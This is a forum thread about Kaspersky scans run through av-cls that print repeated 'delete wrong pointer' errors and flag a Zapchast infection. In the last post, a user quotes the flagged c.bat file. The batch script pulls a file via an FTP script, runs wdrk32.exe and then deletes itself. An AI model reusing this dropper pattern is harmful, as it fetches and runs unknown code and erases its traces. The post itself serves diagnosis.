av-cls and Kaspersky - Error: delete wrong pointer <00000000>

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View
Running Kaspersky VIA av-cls on two machines, both XP.   Thousands of
"Error: delete wrong pointer <00000000>" messages during the scan
process.    Is this SOP?     Said error messages do now show up in the
log.   On one machine (the other is still being scanned) 'K reported
it found a Zapchast in a file called c.bat     The work machines use
Trend Micro so it may have been inactivated but not deleted by Trend,
or a false positive.  I'll check the other machines.


Re: av-cls and Kaspersky - Error: delete wrong pointer <00000000>


| Running Kaspersky VIA av-cls on two machines, both XP.   Thousands of
| "Error: delete wrong pointer <00000000>" messages during the scan
| process.    Is this SOP?     Said error messages do now show up in the
| log.   On one machine (the other is still being scanned) 'K reported
| it found a Zapchast in a file called c.bat     The work machines use
| Trend Micro so it may have been inactivated but not deleted by Trend,
| or a false positive.  I'll check the other machines.

Can you send me log extracts ?

--
Dave
http://www.claymania.com/removal-trojan-adware.html
Multi-AV - http://www.pctipp.ch/downloads/dl/35905.asp



Re: av-cls and Kaspersky - Error: delete wrong pointer <00000000>

wrote:
Quoted text here. Click to load it

========
Will do tomorrow when I return to work.


Re: av-cls and Kaspersky - Error: delete wrong pointer <00000000>

 I noticed the same thing this week scanning win98 se as it was scanning
thru the  cab files...
mc



Re: av-cls and Kaspersky - Error: delete wrong pointer <00000000>

wrote:
Quoted text here. Click to load it

=========
Just sent the log file and a screen snapshot.  You can run 'K over and
over on the files that have the 'wrong pointer' message and always get
it.   Doesn't seem to harm anything.


Re: av-cls and Kaspersky - Error: delete wrong pointer <00000000>

Quoted text here. Click to load it

=========
As to the Zapchast(sp?) the c.bat file contained:
@echo off
ftp -n -v -s:.pif
wdrk32.exe
del .pif
del /F c.bat
exit /y

The file wdrk32.exe was 0 bytes on one computer and didn't exist on
the other.   Creation date for the .bat was in 2005.  Trend most
likely cleaned the payload file.    It is also probable the malware
was taken care of before us workers got the computer.    Three
computers, all arriving the same time and they're the only ones having
the c.bat on them.   Who knows what big-bro does behind the scenes :0)



Site Timeline